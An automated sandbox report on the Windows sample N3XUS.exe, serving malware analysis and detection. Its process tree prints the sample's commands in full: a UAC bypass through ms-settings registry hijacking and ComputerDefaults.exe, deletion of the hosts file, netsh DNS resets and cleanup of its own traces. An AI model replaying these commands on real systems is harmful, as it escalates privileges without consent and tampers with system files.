dcf5453a2be04f3ebe45d56e631a9cadb573b27de1ef142ecd958ba8560f0dd0

Resubmissions

21/11/2024, 10:08

241121-l6klns1ame 7

Analysis

max time kernel
435s
max time network
432s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
21/11/2024, 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

N3XUS.exe
Size

255KB
MD5

a5c463cb69a24c37d962587706f4df4b
SHA1

634520f698c5ce7df3e51174fe64306b1b0f1bfe
SHA256

dcf5453a2be04f3ebe45d56e631a9cadb573b27de1ef142ecd958ba8560f0dd0
SHA512

92f61d162802401ae7473e235becd580419a57e1cfe99475166717d93de26e51ecbd60bbebbe0b9a6a8fe15bb1c42c9f31676cef37815f040a0c408108c04c2e
SSDEEP

3072:Sz2z1EWSnEvrSmD+l25mFdO4em5guIg+GtfDVVtTzKE:Sz2zBvrSmD/d4z5UlqDVvzKE

Score

7^/10

defense_evasion persistence privilege_escalation

Malware Config

Signatures

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000\Control Panel\International\Geo\Nation	wscript.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Modifies registry class 33 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\3895.vbs"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\6842.vbs"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\7239.vbs"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command	reg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1276 wrote to memory of 1116	1276	N3XUS.exe	88
PID 1276 wrote to memory of 1116	1276	N3XUS.exe	88
PID 1116 wrote to memory of 468	1116	cmd.exe	90
PID 1116 wrote to memory of 468	1116	cmd.exe	90
PID 1276 wrote to memory of 1768	1276	N3XUS.exe	91
PID 1276 wrote to memory of 1768	1276	N3XUS.exe	91
PID 1768 wrote to memory of 1876	1768	cmd.exe	93
PID 1768 wrote to memory of 1876	1768	cmd.exe	93
PID 1768 wrote to memory of 1012	1768	cmd.exe	94
PID 1768 wrote to memory of 1012	1768	cmd.exe	94
PID 1276 wrote to memory of 2876	1276	N3XUS.exe	95
PID 1276 wrote to memory of 2876	1276	N3XUS.exe	95
PID 2876 wrote to memory of 3240	2876	cmd.exe	97
PID 2876 wrote to memory of 3240	2876	cmd.exe	97
PID 3240 wrote to memory of 1080	3240	ComputerDefaults.exe	98
PID 3240 wrote to memory of 1080	3240	ComputerDefaults.exe	98
PID 1080 wrote to memory of 3708	1080	wscript.exe	99
PID 1080 wrote to memory of 3708	1080	wscript.exe	99
PID 1276 wrote to memory of 3348	1276	N3XUS.exe	102
PID 1276 wrote to memory of 3348	1276	N3XUS.exe	102
PID 1276 wrote to memory of 4372	1276	N3XUS.exe	104
PID 1276 wrote to memory of 4372	1276	N3XUS.exe	104
PID 4372 wrote to memory of 1208	4372	cmd.exe	106
PID 4372 wrote to memory of 1208	4372	cmd.exe	106
PID 1276 wrote to memory of 4584	1276	N3XUS.exe	109
PID 1276 wrote to memory of 4584	1276	N3XUS.exe	109
PID 4584 wrote to memory of 4384	4584	cmd.exe	111
PID 4584 wrote to memory of 4384	4584	cmd.exe	111
PID 1276 wrote to memory of 3592	1276	N3XUS.exe	112
PID 1276 wrote to memory of 3592	1276	N3XUS.exe	112
PID 3592 wrote to memory of 1992	3592	cmd.exe	114
PID 3592 wrote to memory of 1992	3592	cmd.exe	114
PID 3592 wrote to memory of 3840	3592	cmd.exe	115
PID 3592 wrote to memory of 3840	3592	cmd.exe	115
PID 1276 wrote to memory of 2164	1276	N3XUS.exe	116
PID 1276 wrote to memory of 2164	1276	N3XUS.exe	116
PID 2164 wrote to memory of 2544	2164	cmd.exe	118
PID 2164 wrote to memory of 2544	2164	cmd.exe	118
PID 2544 wrote to memory of 1656	2544	ComputerDefaults.exe	119
PID 2544 wrote to memory of 1656	2544	ComputerDefaults.exe	119
PID 1656 wrote to memory of 4784	1656	wscript.exe	120
PID 1656 wrote to memory of 4784	1656	wscript.exe	120
PID 1276 wrote to memory of 2572	1276	N3XUS.exe	122
PID 1276 wrote to memory of 2572	1276	N3XUS.exe	122
PID 1276 wrote to memory of 4076	1276	N3XUS.exe	124
PID 1276 wrote to memory of 4076	1276	N3XUS.exe	124
PID 4076 wrote to memory of 3124	4076	cmd.exe	126
PID 4076 wrote to memory of 3124	4076	cmd.exe	126
PID 1276 wrote to memory of 2012	1276	N3XUS.exe	127
PID 1276 wrote to memory of 2012	1276	N3XUS.exe	127
PID 2012 wrote to memory of 3944	2012	cmd.exe	129
PID 2012 wrote to memory of 3944	2012	cmd.exe	129
PID 1276 wrote to memory of 3048	1276	N3XUS.exe	130
PID 1276 wrote to memory of 3048	1276	N3XUS.exe	130
PID 3048 wrote to memory of 4548	3048	cmd.exe	132
PID 3048 wrote to memory of 4548	3048	cmd.exe	132
PID 3048 wrote to memory of 1176	3048	cmd.exe	133
PID 3048 wrote to memory of 1176	3048	cmd.exe	133
PID 1276 wrote to memory of 4008	1276	N3XUS.exe	134
PID 1276 wrote to memory of 4008	1276	N3XUS.exe	134
PID 4008 wrote to memory of 2532	4008	cmd.exe	136
PID 4008 wrote to memory of 2532	4008	cmd.exe	136
PID 2532 wrote to memory of 3560	2532	ComputerDefaults.exe	137
PID 2532 wrote to memory of 3560	2532	ComputerDefaults.exe	137

C:\Users\Admin\AppData\Local\Temp\N3XUS.exe
"C:\Users\Admin\AppData\Local\Temp\N3XUS.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1276
- C:\Windows\system32\cmd.exe
  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1116
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    PID:468
- C:\Windows\system32\cmd.exe
  /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\3895.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\3895.vbs" /f
    3⤵
    - Modifies registry class
    PID:1876
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
    3⤵
    - Modifies registry class
    PID:1012
- C:\Windows\system32\cmd.exe
  /c start /B ComputerDefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2876
- - C:\Windows\system32\ComputerDefaults.exe
    ComputerDefaults.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3240
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" C:\Users\Admin\AppData\Local\Temp\3895.vbs
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1080
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
        5⤵
        
        PID:3708
- C:\Windows\system32\cmd.exe
  /c del /f C:\Users\Admin\AppData\Local\Temp\3895.vbs
  2⤵
  PID:3348
- C:\Windows\system32\cmd.exe
  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4372
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    - Modifies registry class
    PID:1208
- C:\Windows\system32\cmd.exe
  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    PID:4384
- C:\Windows\system32\cmd.exe
  /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6842.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3592
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6842.vbs" /f
    3⤵
    - Modifies registry class
    PID:1992
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
    3⤵
    - Modifies registry class
    PID:3840
- C:\Windows\system32\cmd.exe
  /c start /B ComputerDefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\Windows\system32\ComputerDefaults.exe
    ComputerDefaults.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2544
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" C:\Users\Admin\AppData\Local\Temp\6842.vbs
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1656
    - - C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4784
- C:\Windows\system32\cmd.exe
  /c del /f C:\Users\Admin\AppData\Local\Temp\6842.vbs
  2⤵
  PID:2572
- C:\Windows\system32\cmd.exe
  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4076
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    - Modifies registry class
    PID:3124
- C:\Windows\system32\cmd.exe
  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    PID:3944
- C:\Windows\system32\cmd.exe
  /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7239.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3048
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7239.vbs" /f
    3⤵
    - Modifies registry class
    PID:4548
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
    3⤵
    - Modifies registry class
    PID:1176
- C:\Windows\system32\cmd.exe
  /c start /B ComputerDefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4008
- - C:\Windows\system32\ComputerDefaults.exe
    ComputerDefaults.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2532
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" C:\Users\Admin\AppData\Local\Temp\7239.vbs
      4⤵
      Checks computer location settings
      PID:3560
    - - C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1056
- C:\Windows\system32\cmd.exe
  /c del /f C:\Users\Admin\AppData\Local\Temp\7239.vbs
  2⤵
  PID:1628
- C:\Windows\system32\cmd.exe
  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
  2⤵
  PID:4708
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    - Modifies registry class
    PID:4620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3895.vbs

Filesize
125B

MD5
8b4ed5c47fdddbeba260ef11cfca88c6

SHA1
868f11f8ed78ebe871f9da182d053f349834b017

SHA256
170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5

SHA512
87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\6842.vbs

Filesize
114B

MD5
34b33b5a437e20d03d79b62a797dfe99

SHA1
9b57b598a7e9d66157a05a44bc7c097bf5486e6c

SHA256
f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1

SHA512
757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7239.vbs

Filesize
117B

MD5
bb8cfb89bce8af7384447115a115fb23

SHA1
6a0e728f4953128db9db52474ae5608ecee9c9c3

SHA256
d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485

SHA512
d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553

Download Submit
memory/1276-1-0x0000029E9EFC0000-0x0000029E9EFC1000-memory.dmp

Filesize
4KB

Download
memory/1276-0-0x0000029E9EFB0000-0x0000029E9EFB1000-memory.dmp

Filesize
4KB

Download
memory/1276-2-0x0000029E9EFE0000-0x0000029E9EFE1000-memory.dmp

Filesize
4KB

Download
memory/1276-4-0x0000029E9F000000-0x0000029E9F001000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads